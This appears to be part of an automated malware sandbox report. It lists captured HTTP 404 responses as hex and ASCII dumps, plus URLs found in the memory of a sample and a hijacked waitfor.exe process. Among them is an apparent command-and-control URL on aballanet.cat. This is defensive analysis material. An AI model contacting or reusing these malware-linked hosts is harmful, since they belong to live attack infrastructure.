          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 02:59:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 03:00:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 03:00:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:01:55 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:01:58 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:02:01 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:02:04 GMTServer: ApacheContent-Length: 263Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:02:09 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:02:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:02:15 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:02:18 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67811756-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000071A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://aballanet.cat/4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6
          Source: 02Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: 02Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root
          Source: 02Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
          Source: waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
          Source: waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
